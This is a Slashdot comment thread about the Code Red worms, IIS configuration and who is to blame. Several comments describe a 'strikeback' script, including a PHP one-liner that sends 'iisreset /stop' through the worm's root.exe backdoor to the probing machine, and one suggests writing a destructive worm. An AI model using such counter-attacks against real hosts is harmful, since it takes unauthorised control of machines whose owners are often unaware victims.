      A dangerous "virus" threatens the entire internet (*cough*) and then microsoft comes to the rescue with a patch and saves the internet!

    2. Re:Microsoft PR by SpaceLifeForm · · Score: 1
      Actually, it might even be good PR for them too.

      this is what joe user will think:
      A dangerous "virus" threatens the entire internet (*cough*) and then microsoft comes to the rescue with a patch and saves the internet!

      Which would be a good reason for M$ to leave the holes,
      then release CR, wait for the PR, then release the patch when the PR starts to turn negative (Hotmail).
      Repeat as needed.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
  33. Re:FUD ALERT by LinuxHam · · Score: 1

    Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass.

    You deny Service Packs breaking the OS and then ask for an example of one "opening a hole". I don't have an example of a Service Pack that "opened a hole", but Service Pack 6 broke TCP/IP on NTWS and NT Server such that only users who were logged in with **admin** privileges could use TCP/IP. Imagine being 5,000 users into an automated 10,000 user upgrade when you find out that none of the regular employees can access their email anymore.

    If you suggest putting the 10,000 users in the Domain Admin group to get around this, then you are as fucking stupid as you sound.

    --
    Intelligent Life on Earth
  34. Re:setting this up? by Mike+Hicks · · Score: 2

    That's Slashdot's posting code trying to prevent really long strings from ending up in posts and screwing up the HTML table layout.

  35. Re:The $64K question: Does it actually work? by fava · · Score: 1
    Have you ever read the EULA?

    It basically says that Microsoft cannot be held responsible for anything, including the results of their own incompetence. Nor does it promise that the software will actually do anything useful. But if you try to steal it, it suddenly becomes extremely valuable and you are subject to prosecution to the full extent of the law.

    EULAs are very one sided documents.

  36. IIS. Windows next... by LinuxMacWin · · Score: 1
    and reboots your system; it also gives you an option to permanantly disable IIS.......

    So all we need now is Code Blue which will result in us getting the option of disabling Windows...

  37. Re:MS Tool by Anonymous Coward · · Score: 0

    What has making changes to the web server daemon got to do with restarting the operating system?

    Is IIS Yet Another Microsoft Program That Runs In Ring 0 ?

    See also: Internet Explorer

  38. Re:Stop blaming microsoft by slushpupie · · Score: 2, Insightful

    There are many other options when using strings in C, you are not required to use a limited array of char.. in this day, if you are security conscious, you should consider all the possibilities when writing a program.

  39. strikeback fun, but not working very often... by jqh1 · · Score: 1

    When I saw the strikeback script, I immediately installed in on my poor little beat up P166 running Linux/Apache -- hapless enough to be in my laundry room and the 24.x.x.x class A at the same time.

    I was so excited, I modified the script to add a log file that showed whether a shutdown had occurred.

    First thing I noticed is that the server shutdown really couldn't happen logically, since the first strikeback request would have shut down IIS, which would have to be running to get the server shutdown request. Easy workaround there...

    Then I looked at the log and noticed that the shutdowns weren't occurring, so I tried the strikeback requests manually on a couple of the attackers. They generally refused my connection because there were 'too many users'. Is this MS Personal Web Server, which maybe allows only one connected user at a time?

    Anyway, many thanks to the folks who wrote that script! Made my vengeance-starved day!

    --
    who's moderating the meta-moderators?
    1. Re:strikeback fun, but not working very often... by RedX · · Score: 2

      IIRC, any MS machine that is a non-server OS will only allow 10 network connections, so I'd think that the PWS service would fall under this limitation.

  40. Users share much of the blame by Anonymous Coward · · Score: 0

    1) Exploit is discovered
    2) MS releases a patch
    3) CR1
    4) Every news outlet screams about it for a week
    5) CR2
    6) Again, all over the news, but not with the intensity of the first
    7) CR3

    With the release of CR1 and the widespread news coverage, it is hard to believe that sysadmins had not heard of this exploit by the time CR2 was released. I agree that MS takes some of the blame here, releasing software with a hole that they may or may not have been aware of on release. But, as soon as they released the patch and CR1 became huge news it became the responsibility of the system administrators to take action. With hundreds of thousands of computers still being infected it seems pretty clear that people just don't care.

    When people hear about a defective toy from Burger King, they all go check to see if they have the toy in question and whether little Timmy is putting it in his mouth. They know the danger here and fear it, prompting them to take action. When they see the anchorman on the local news channel warning about some computer worm they don't see the danger to themselves in it. These things happen all the time and usually there is only a small percentage of people who are affected by the worm or virus. They are not aware of the danger, and all the "this is the big news event of the hour" hoopla in the media dulls them to the possibility that they may be affected.

    We need to encourage those Sysadmins and users who do care to make an attempt to personally contact either the sysadmins at domains that are heavily infected and try to give personal warning that they have problems or we need some kind of counter-traditional-media that really puts the fear of Gord into them.

    Or we need a really really nasty worm that exploits a fixable vulnerability and announces itself to the user once an hour, and if no action is taken within a reasonable time it does nasty, malicious things. If someone truly got bitten once, and saw for themselves how computer security is really their responsibility, I think the number of trojans that Bob Goodnews-Badtoupee on the evening news has to read with his plastic grimace will drop significantly.

    --Cheebus
    One day I'll set up an account

    1. Re:Users share much of the blame by nmos · · Score: 1

      " especially because the patch is HARDER to install in unix because it probably requires a recompile of the service."

      Hmm, how is this hard? :

      apt-get update; apt-get upgrade

    2. Re:Users share much of the blame by malfunct · · Score: 1
      Someone needs to make worm-like software to hit Unix exploits to show that all software is vulnerable to breaking.

      Granted it's open source so people will have a patch in 15 minutes but you will see the EXACT same problem as on Windows where people don't install the patch, especially because the patch is HARDER to install in Unix because it probably requires a recompile of the service.

      --

      "You can now flame me, I am full of love,"

    3. Re:Users share much of the blame by Anonymous Coward · · Score: 0

      It was done and it was called RAMEN. Same scenario, except set $IRRESPONSIBLE_BIG_SOFTWARE_COMPANY to Red Hat instead of Microsoft.

  41. If you've had a corporate hit on your network... by GC · · Score: 2

    Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.

    It basically looks for vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.

    Nice to see someone has come up with a clean, pro-active method to kill this little menace off.

  42. Re:Liability for software defects by jeffy124 · · Score: 1

    Who's to say that MS couldn't hide a hole they discover in their product?

    --
    The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
  43. Re:Has anyone tried running this under Windows? by john_uy · · Score: 1

    I have installed this on W2K Advanced Server.

    I tried it in IIS5. I redirected the default.ida from the root folder to the scripts page with the real default.ida.

    I am not sure though if it really reboots the infected machines. But there is no error in the script. I am using Activestate's Perl program for IIS (PERLIS.DLL)

    A little off topic, how do you know if the infected computer is version 1 or 2?

    Also, earlier, the IIS service kept on getting errors (timeouts). Is it due to the Code Red? After I patched the system, everything seemed well.

    johnlaw

    --
    Live your life each day as if it was your last.
  44. Re:I don't think this is funny... by BorgDrone · · Score: 2

    clicking on that link does NOT reboot your machine even if you are infected.
    the reboot stuff only triggers when an infected machine tries to break into the machine running that script.

  45. Re:Start blaming Microsoft again by reflective+recursion · · Score: 1

    So what you are saying is there is an alternative to Microsoft? One minute the hordes of Slashdot are ready to knock over Bill Gates' monopolistic empire, the next they are tearing it down with alternatives. Let us all rejoice in the coherence and nonhypocritical nature of Slashdot readers.

    Why blame _anyone_? Just jump ship man. Not like you are forced by gun to use their trashy software. You can only blame when it is a monopoly. Clearly you have alternatives.

    --
    Dijkstra Considered Dead
  46. Re:Here's how open source would be better... by reflective+recursion · · Score: 1

    What exactly does your (and other posters') argument, or need, for a different vendor of the same product have to do with security? This is complete oranges and apples. You say "I could guarantee you a different car with the same chassy/engine combination under a different brand name." I can also guarantee you a Linux system with FAT32 support. That does not make Linux a Windows machine, now does it? There are certain distributions (tinyslack or whatever it is called) which use FAT (UMSDOS) for their primary partition. It is akin to using the same engine or chassis.

    Where can you get the Linux kernel in FreeBSD? BeOS? NT? The kernel is not an interchangeable part like an engine can be. Nor is the kernel always an open design.

    No, getting an Accord from Acura does not make an Accord an Acura Accord. It is still a Honda. You can pick Accords up at any trade-in garage. I fail to see how this relates in any way to security.

    The reason to need an NT kernel from a different vendor is, well, none. I'm assuming you want an NT kernel for free (as in it costs you nothing). That is the only reason to bring this "argument" up. If the NT kernel was available from another vendor (proprietary), but cost the same as Microsoft you would both still be bitching. Freedom (GNU) is not about greed.

    --
    Dijkstra Considered Dead
  47. Not really the same thing by eddy · · Score: 1, Insightful

    The point of the interlock is to form a dependence. Purpose: to ensure the survival of the worm in a hostile environment. Survival is of paramount importance. Any kind of payload must come second.

    The artificial society would take advantage of the fact that to cleanly kill it off the real-world enemy, us humans, would have to enter into correspondingly interconnected communication and trust

    Payload is a whole other topic, where destruction of data is the least interesting one, though I agree that data-corruption is amongst the most evil payloads.

    --
    Belief is the currency of delusion.
    1. Re:Not really the same thing by eddy · · Score: 1

      Shit, you mean there's prior art?! :-)

      (Yeah I remember, now that you mention it. It might be interesting to see how Windows would behave with two task monitoring each other in the same way. I'm not sure how it works behind the scenes with killing processes.)

      --
      Belief is the currency of delusion.
    2. Re:Not really the same thing by blang · · Score: 2

      From Eric Raymond's jargon file: !X id1
      id1: Friar Tuck... I am under attack! Pray save me!
      id1: Off (aborted)
      id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men!
      id1: Thank you, my good fellow!

      --
      -- Another senseless waste of fine bytes.
  48. Re:Stop blaming microsoft by Anonymous Coward · · Score: 0

    So, Microsoft has given you a mop to clean up the mess they made.

    That's at least as fair as saying that C is responsible. And let's not forget that sendmail was "responsible" for the RTM worm, and that the MPAA is "responsible" for DVD piracy.

    If you believe all these assertions, go ahead and keep doing exactly what you feel like doing. Morals need never bother you because it will NEVER be your fault.

  49. Re:Stop blaming microsoft by Gordonjcp · · Score: 3, Funny

    Blame Alan Turing, he invented stored-program computers...

  50. Re:Some don't know they have IIS by DeeKayWon · · Score: 2
    I'd really like to know how this happens.

    I'm on Win2K Pro right now, freshly installed last night. IIS is not running, because it isn't installed by default. You have to go to Add/Remove Programs and install it yourself. So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge? IIS is installed by default on the server varieties of Win2K, but these people shouldn't be running those. So I wonder, what's going on?

  51. Here's a clue about "Linux worms" by rickmoen · · Score: 2
    Which system did Ramen infect?

    It attacked the brainstems of morons who had left notoriously insecure network-daemon software running unpatched for a year or more. That's what we call being too stupid to live.

    Rick Moen
    rick@linuxmafia.com

  52. Re:Unforgivable! by Anonymous Coward · · Score: 0

    "And, no, my machine was not shut down"

    Fuck, you are lucky for all these tax data would be lost forever...
    That would be mega-fuck.

  53. Re:Unforgivable! by Anonymous Coward · · Score: 0

    Wrong, IIS (l)user...
    An unpatched IIS server DOES mean you're part of the problem...and you WILL be infected eventually, if you're not already. I've watched this worm, and it comes in 'under the radar'...so my guess is you're already infected, and just haven't figured it out yet.
    So here's some advice...
    PATCH YOUR FSCKING SERVER!!!

  54. Re:Stop blaming microsoft by bolverk · · Score: 1

    umm... wasn't that Von Neumann?

  55. Re:The $64K question: Does it actually work? by rm3friskerFTN · · Score: 1
    As I posted earlier [strange ... did someone "astroturf MOD" it to -1?]

    QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

    IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

    --

    I believe Juanita

  56. Re:Not the mess they made... by Anonymous Coward · · Score: 0

    There was actually an easy way to avoid this without even using the M$ security patch. All the admin had to do was disable anonymous access to the IIS Index Server pages. If the admin had required authenticated users only to the Index Server pages then none of this would've happened. I am mostly a Linux/Solaris guy, but one of my clients uses NT. I set their M$ Index Server like this *LAST* year and although Code Red tries to connect, it can't do it because it's got to log in first. The problem with MCSE people, in general, is that they don't understand the concept of locking down a box. Any experienced admin from a Unix-like background knows that the first thing you do when you set up a machine is to lock it down by closing unnecessary services/ports, restricting who can/cannot connect, etc.

  57. Re:Stop blaming microsoft by Capt.+Beyond · · Score: 1
    I agree with you not to blame MICROS~1. Blaming them is like blaming a glass manufacturer for when a robber breaks a window, and steals your tv. Blame the damn virus writer! And blaming the sys admins is like blaming the owner of the house because he/she does not know that the glass they bought with the house is NOT bullet proof.

    Put blame where blame is due!

    --
    -- "Perceptions create reality. By changing your perceptions you change your reality."
  58. Microsoft's Problem! by wirefarm · · Score: 5, Insightful

    This is what happens when you give admins a false sense of security.
    After all, they became an MCSE after a couple months of hitting the books, rather than a few years of hacking old hardware. They got a certificate and the sense that the Microsoft way is the best way - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.
    Some of my friends are MCSEs. - Not all of them are 'hackers' who actually watch what happens in their systems. They trust that MS will send them a shiny new CD with a 'Service Pack', along with a few other goodies to play with when an update is needed.
    The problem is compounded by the fact that these Win2K CDs got passed around - Microsoft knows this and whether or not they admit it, it's part of their marketing. From what I've seen, I'd suspect that the bulk of the problems are coming from the home users who are running a borrowed copy of Win2K on their PC/Cable Modem setup. The ones who don't get the service packs and don't log into Microsoft.com to read the bulletins for fear of being asked for proof of purchase.
    Microsoft has these thousands of unlicensed customers that they know are using their software in a dangerous manner - Everything installed, every service running - all the lights on, but nobody home. What is MS's liability?
    With all of the talk about the significance of an AOL icon vs. an IE icon on the desktop, MS *knows* how people will react when running an install - They know that if the user gets a dialog that says "Activate IIS?" that an unsure user will probably say yes, even if he has no idea what IIS is or what the risks are.
    Microsoft has got to accept the blame for this mess - It is their doing.
    Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licensed* - Now won't that be fun?

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
    1. Re:Microsoft's Problem! by HD+Webdev · · Score: 0

      Since you asked... Most people install IIS because they want to serve HTML or ASP pages, or maybe just FTP.

      IIS is automatically installed and enabled for anyone who upgrades from a full (all packages) install of Win98.

      --
      This is not a dream, not a dream...we are transmitting from the year 1-9-9-9.
    2. Re:Microsoft's Problem! by fod · · Score: 1
      If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.
      Well, no, since Apache doesn't suffer from the design problems IIS have.

      Apache doesn't run as root, so exploitation won't lead to having root.

      As soon as you exploit IIS, you have root.
    3. Re:Microsoft's Problem! by mpe · · Score: 2

      And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuration.

      Actually a real fix would be to move away from monolithic programs. But since process creation is expensive under NT, multithreading (of multi-function programs) is preferred.

      Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

      Except that it would be less obscure to find a fix. IIS isn't modular...

    4. Re:Microsoft's Problem! by MrBogus · · Score: 4, Informative

      - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.

      Since you asked... Most people install IIS because they want to serve HTML or ASP pages, or maybe just FTP.

      What Microsoft doesn't tell you is that Internet Information Service_s_ automatically installs a bunch of other ISAPI services which enable crap that you most likely do not want. Examples include:
      + The ability to query Index Server indexes (idq.dll)
      + Internet Printing
      + Remote data queries
      etc etc

      Some of these things, particularly idq.dll, have *repeatedly* had security holes. And that's why installing the patch is not a fix, because it's only a matter of time until Code Red IV is exploiting another IIS bug to similar effect.

      The real fix is to disable the extension mappings for things like .ida/.idq and so on (UI is buried in the Computer Management console), and then sleep at night because you don't have to worry about most of the IIS patches. Of course, neither Microsoft nor the mainstream media, nor Slashdot for the most part, is offering this advice. (Somewhere buried on their site, they have a 'Securing IIS' document where this is the #1 recommendation, but since they aren't getting the word out, their ass will be bitten hard again.)

      And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuration. Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

      --

      When I hear the word 'innovation', I reach for my pistol.
    5. Re:Microsoft's Problem! by Shimmer · · Score: 1

      This is false. IIS does not run as root by default. It runs using its own IUSR_machinename account, which has limited local privileges.

      MS software is crappy enough without you exaggerating its problems.

      -- Brian

      --
      The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
    6. Re:Microsoft's Problem! by Shimmer · · Score: 1

      Good point. You're right.

      -- Brian

      --
      The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
    7. Re:Microsoft's Problem! by styrotech · · Score: 1

      Sorry, IIS runs with LocalSystem privileges (more control over the server than Administrator has).
      Sure IIS will then switch to IUSR_* for any anonymous request, but if you are hit with a buffer overflow the exploit will happen before this switch can take place and voila, the exploit has LocalSystem access.

      The reason IIS needs LocalSystem rights is so it can switch its security context to the user (or IUSR_* for unauthenticated requests) who is making the request.

      IUSR_* is the account designated for determining the access rights for anonymous users, not the account IIS runs under.

    8. Re:Microsoft's Problem! by catfood · · Score: 1
      If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

      That's true, but the thing is, that's not the way Linux distro vendors normally operate. Because that's not the way Linux is normally used.

      What we're seeing is the effect of Microsoft's long-standing policy of "don't worry, be happy." applied to installation and administration. Making the admin turn on needed services, manually, one at a time, is contrary to DWBH.

      Linux was never meant to be a DWBH system. Once in a while we get a distro that tries to be DWBH (wasn't it RH6?)--but when that happens everyone ridicules it and knowledgeable admins stay away.

    9. Re:Microsoft's Problem! by Anonymous Coward · · Score: 0

      "You cant blame MS for everything." Well of course I/you/we can! The day after my wife bought a copy of Win2k, she had a fender bender... and the day after that, Win2k ate my kid's homework... Coincidence? I don't think so!

    10. Re:Microsoft's Problem! by Anonymous Coward · · Score: 0

      You don't need proof of purchase to download service packs or use windows update.

    11. Re:Microsoft's Problem! by wolf- · · Score: 1

      Microsoft has got to accept the blame for this mess - It is their doing

      And by that thinking, Linus is at fault for an OS that allows smurf attacks, malformed tcp packets, etc.

      You can't blame MS for everything.

      --
      ----- LoboSoft specializes in Digital Language Lab
    12. Re:Microsoft's Problem! by Phroggy · · Score: 1

      Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licenced* - Now won't that be fun?

      I have to point out here that many of the servers affected by the Code Red worms were on residential cable connections, where running any Web server is an explicit TOS violation. The broadband ISPs never enforced their TOS unless you brought attention to yourself, but it's always been against their policy. You suggest you should have to be licensed in order to run a server - what if you just had to use an ISP that would officially allow you to do so?

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    13. Re:Microsoft's Problem! by Anonymous Coward · · Score: 1, Informative

      Actually running a web server is NOT a violation of the TOS. Abusing bandwidth is, but if your web server doesn't utilize much bandwidth, then you haven't run afoul of your TOS. I told AT&T this along with requesting a timeframe as to when they planned on reopening the filters on port 80. Until then, I just reassigned my web server to another port so people can have outside access to it if I want them to.

  59. Re:Wow by Anonymous Coward · · Score: 0

    Well, I have had the government of Iran try to infect me a couple of weeks ago. Kinda funny.

  60. Re:FUD ALERT by Anonymous Coward · · Score: 0
    I dread IE updates and service packs. There are _always_ problems, I always have to fiddle around with safe-mode before I can actually log into my machine after an update.

    As an amusing sidenote, MS isn't the only one with install issues, I have yet to successfully install 1.3.1 or 1.4 Java RE or SDK. Piece of shit, useless, good for nothing jar files! No wonder Java is going under, if I'm having trouble installing the JRE, a luser on XP (which will _not_ ship with Java) has absolutely no hope of experiencing the shittiness that is Java.

  61. Re:FUD ALERT by ZxCv · · Score: 1

    IIRC, it was SP5 that broke the sequencing algorithm because I wanna say I remember them having an update to 5 shortly after called 5a. Regardless, even though 5 broke the sequencing, it did not open up any new holes in Windows. An attacker would have to already have access to the machine in order to exploit the broken sequencing.

    I can't say much about Exchange because I don't have tons of experience on it. Only one of our customers insists on using it and even at that, the most I've ever had to do is add a new mail user.

    I think the bottom line is that the original post was definitely FUD (although I'm not sure how much I buy into the conspiracy theorist mentality of paid MS bashers). I see a difference between a service pack and individual security fixes, and at that, I've never seen a service pack open up any (real) new holes on any Windows box I've ever had to deal with.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  62. setting this up? by Anonymous Coward · · Score: 0

    how do you do step 3?? 3.Make sure the .ida extension is handled as a perl CGI script.

    1. Re:setting this up? by Anonymous Coward · · Score: 0

      Looks like this one works. Just done it on my own machine. Can anyone confirm that it really does, please?

    2. Re:setting this up? by sparkz · · Score: 1

      And / must be a ExecCGI directory, of course... Add "ExecCGI" to the options of your DocumentRoot entry.

      --
      Author, Shell Scripting : Expert Re
    3. Re:setting this up? by falser · · Score: 1
      Is that space in "ro ot" supposed to be there?

    4. Re:setting this up? by BorgDrone · · Score: 4, Informative

      in /etc/apache/httpd.conf:

      AddHandler cgi-script .ida

    5. Re:setting this up? by nick-less · · Score: 2, Informative
      actually one could also do something like
      <?php fopen("http://".getenv("REMOTE_ADDR")."/scripts/ro ot.exe?/c+iisreset+/stop","r"); ?>
      and
      AddType application/x-httpd-php .ida

      In case you prefer php
  63. The beginning of the end for IIS? by rambot · · Score: 1, Redundant

    All of the Code Red worms, like it or not, have a good effect to an equal degree that they are bad or annoying. What does not kill us makes us stronger (or kills IIS, which I wouldn't mind a bit). The interesting thing about the whole Code Red phenomenon is that it appears to be the first worm/virus to not only exploit a flaw in software, but a flaw in the character of the IIS server admin. Brilliant experiment in the area of a socially engineered worm. I have my doubts that they had envisioned it in this way when they created the worm however. I believe that a new breed of virus or worms has been born and now the door has been opened for worms that prey on the laziness and ignorance of unqualified or unreliable server operators. While all others have done this in the past, these are different in that they don't pose a threat specifically to one machine's hardware or files, rather the net as a whole. Just look at the numbers of machines still infected. IIS ops are either entirely uninformed, or just have the "I'll just reboot, I don't have time to install the patch" mentality.

    I am sure the dickwads over at Microsoft have spun this into a "Money Making Opportunity" for there "Open Source is UNAmerican and Unsafe" server marketing campaign. I can just hear it now.. "With the new Advanced Server Ver.666, you won't get hacked by that nasty code red back door we left open for you. We fixed it!" (thereby adding 3 more new ones) haha.

    1. Re:The beginning of the end for IIS? by onepoint · · Score: 1

      I'm giving a system admin a complete reaming after he told the president of the firm that "all the systems are safe, I'm up to date on my patches". 5 days later, bang, "code red". I have been laughing my ass off; this guy thinks he's the UBER Geek of the firm, I'm going to enjoy this.

      onepoint

      --
      if you see me, smile and say hello.
  64. Re:Not the mess they made... by Anonymous Coward · · Score: 0

    Stop crying about NT Admins. Is a web developer who has IIS installed on his laptop an NT Admin? Is a 15-year old who runs a warez FTP site with IIS an NT Admin? Is your mom, who when building your family web page, installed Front Page and unknowingly installed a web server an NT Admin? Is an @home subscriber who has a home LAN and uses NT Server as a PDC an NT Admin?

    The fault ultimately lies with MS, as it did with Red Hat and the Ramen fiasco: vendors shipping vulnerable packages that nobody asked for.

    Your Yellow Dog Linux box was probably rooted through the BIND exploit and you probably don't even know it.

  65. Re:No. by rambot · · Score: 1

    Umm... WRONG!

    You won't be able to "put a stop to this thing really fast" no matter what you do. M$/IIS is bloatware chock full of undiscovered exploits. This is not the last of THIS TYPE of worm.

    AND! Yes, it does say something about the character of the IIS admins, because it takes very little technical know-how to get an IIS server running. ("I had IIS running? I had no idea") Like I said! Uninformed, ignorant, or lazy! PICK ONE!

    I for one am glad. This is just the type of thing that can actually cause enough damage to the already tarnished track record of M$ commercial server market, to help see a real decline in their numbers.

    IIS is a disease. Apache is the cure.

  66. Re:And it keeps going by Swaffs · · Score: 1

    They fail to mention that many people are running it and aren't even aware. They should have suggested that each person running NT or 2000 should (somehow) check to make sure they aren't infected.

    --

    --
    "Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]

  67. Re:Liability for software defects by Legion303 · · Score: 1
    Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?

    I've thought about this. Under linux, I've only very rarely had ANY problems with 3rd-party software taking down the whole system. Both times it happened, it was Netscape. As far as 3rd-party drivers go, not a single one has ever caused a noticeable problem when I'm in linux.

    Don't get me wrong, I *like* Windows when it works right. But blaming the problem on 3rd-party drivers is just misguided.

    -Legion

  68. Next step: read the damn articles by cabbey · · Score: 2

    I mean Michael went to all the trouble to link to such a script and all, a few tweaks and you've got what you asked for.

    It's a pointless endeavour though. Of the 1300+ unique hosts that have bounced off my apache machines in the last ~70 hours, only 10 seem to actually be accepting requests for root.exe... the rest throw back either a 404 or a 403, with a lot refusing connections, or just returning a "server overloaded" message. Of those ten accepting requests for root.exe, two returned some kind of funny response, one redirected to goatse.cx, and the other seven seemed to actually accept commands.

  69. Re:Remind me again... by Omnifarious · · Score: 2

    Well, the first item in that list isn't actually an Apache exploit. It's a piece of trojan code that people are tricked into running by telling them that it's an exploit detector.

    If you expect a count of google hit results to somehow bear any weight in this argument, you're an idiot. One, any given exploit will have 5-10 hits as google indexes mailing list archives. Two, it will catch all mention of 'Apache' and 'exploit' whether or not the thing being mentioned really IS an Apache exploit.

  70. Script Notifies Infected Code Red Domains by helixcode123 · · Score: 1
    I was inspired to write this script after thinking about all those poor folks out there that are clueless about the fact that they're running infected IIS servers.

    It basically just sends a message to the abuse@domain.foo to let them know about the infestation.

    OK, so it's no SpamCop.org, but hey, I started writing it at 11:00 tonight.

    --

    In a band? Use WheresTheGig for free.

  71. False sense of security by einhverfr · · Score: 2
    Here is my disclosure: I hold an MCSE (I also hold Linux Professional Institute Level 1, Server+, Network+, A+, and Inet+ certs but that is beside the point).

    The Windows GUI follows many of the same design principles that Mac followed for years, which is why Apple never marketed the Macs as servers-- the abstraction is great in a workstation but in a complex server environment it is dangerous not to have the ability to participate in the system in the way one does with UNIX. Apple sold servers too, but they ran on UNIX.

    Now you have trained monkeys who think they know everything about NT, which really amounts to "reboot when it bluescreens." They think that they are secure because of the quality of Microsoft's software. Yet they don't really know how TCP works, so they have no clue how to begin to think about security from the outside-- all they know is security from the inside, which is all the exams cover, and all Microsoft wants you to think about because that is where they have the most features (yeah, if you can break in from the outside, you can break in from the inside, though).

    So now, Microsoft has issued a patch to remove a backdoor-- one loudly advertised. Where is the security in that? They should have, on their web site, in no uncertain terms, exactly what their engineers are telling their customers and exactly what the rest of the security community is saying: If you are infected, reload your computers.

    There is a false sense of security in using this patch. Your IIS server has a backdoor which was heavily advertised to the net. Anybody could have installed another backdoor and you, as the admin, would probably never find it. Not, at any rate, until someone used it to deface your site, publish your confidential information, destroy critical information, or other such activity...

    --

    LedgerSMB: Open source Accounting/ERP
  72. Re:Script doesn't work anyways by Dahan · · Score: 1

    You mean #357? In that one, GC says he and others haven't found a way to use root.exe to shutdown IIS either. As far as I know, an admin would have to be actively asking for trouble to let CGI scripts/EXEs have privileges to stop IIS. I suspect most CR-infected machines are adminned by the passively clueless, not actively stupid :) They'd have to put the IUSR account into the Power Users group (by default, it's in the Guests group), change the anonymous user to a more privileged account, or something like that for someone to use /scripts/root.exe to stop IIS. BTW, NTFS doesn't really come into play, since that only affects filesystem access, not user privileges--even if someone installed Win2K on a FAT partition, IUSR still wouldn't be able to stop any services.

  73. What my default.ida perl script looks like! :) by Frag-A-Muffin · · Score: 1

    #!/usr/bin/perl -w
    # CGI handler for /default.ida: answer the worm's probe with a redirect
    # to microsoft.com, passing the original query string along unchanged.
    print "Location: http://www.microsoft.com/default.ida?$ENV{'QUERY_STRING'}\n\n";
    exit;



    I don't know why there's a space showing up in the word QUERY_STRING above, but you get the picture.

    Let's get everyone running apache (that's getting hit by stupid admins) to do this! :)

    --

    AirSpeak - http://itunes.com/apps/AirSpeak
  74. Re:Stop blaming microsoft by Perplexia · · Score: 1

    I rarely use C's or C++'s overflowable library routines. Since when is the bounds checked vector overflowable? What library routines do you use then?

  75. Re:Stop blaming microsoft by SuiteSisterMary · · Score: 2

    Criminals subsequently come up with a version of bullets coated with a Teflon derivative. Manufacturer sends out information that they've an add-on spray that will prevent these new bullets from penetrating their windows. Unsprayed windows will NOT stop these new bullets. You don't get this spray and apply it. MAYBE YOU DON'T EVEN REALIZE THAT YOU'VE GOT BULLET PROOF WINDOWS. Criminals start shooting random windows. They don't actually do much, just shoot the windows. Is it the manufacturer's fault?

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  76. Re:Stop blaming microsoft by nevets · · Score: 1

    Although you were marked as funny, I'll assume you were being sarcastic.

    I believe that the above poster was referring to library routines such as sprintf and scanf, which do not check the size of the buffer that they are about to write a variable-length item into.

    If you use glibc, then you have some available library calls such as snprintf which fix some of the problems.

    --
    Steven Rostedt
    -- Nevermind
  77. Re:Unforgivable! by Remote · · Score: 1


    Smells trolly. Given the choice between having my machine flood others or be shutdown, I'd rather it be shut down.


    I'm guessing you've never been DoS'd? It's easy to make statements like yours when living in lala land.


    There are posts in this discussion from people who claim to have lost work because of that childish link. I'm not trolling, I even think that this calls for an apology from /.


    An unpatched IIS server does not mean an infected one. Granted, I've never been DoS'd, but I'm not the type who takes justice into my own hands. Or else I would think this should be done to spammers, then to sites with pop-up windows, then to sites with banner ads, then to sites I just happen not to like.

  78. Re:Stop blaming microsoft by Chris+Johnson · · Score: 2

    That is a really stupid place to optimise. I bet it barely shows up on profiling at all, compared to memory management and offscreen bitmap drawing :)

  79. Re:So how did your site fare? by Anonymous Coward · · Score: 1, Informative

    The large automotive I work for got hit on the internal network last Monday. We lost much of the networking for three days as everything run by IS is NT based (DNS etc.)

    Fortunately the applications I'm responsible for run on Solaris, Linux and Tomcat they stayed up fine, but none of our external customers could see them due to much of the internal infrastructure being closed down.

    The access logs for the servers indicate that my app was probed by at least 300 unique servers from inside the firewall. The issue is now mostly solved on my local domain, but I can watch the worm spreading throughout the rest of the organisation.

    This is the third major incident this year due to a combination of bad administration and having chosen a complete MS based infrastructure (previous outbreaks of Outlook issues have closed the networks for several days). I can't understand why nobody is questioning this decision.

  80. More specifically... by Giant+Hairy+Spider · · Score: 3, Insightful

    Blame the bozo who designed strncat!

    This may not be the cause of this particular overflow, but it causes a very large number of them.

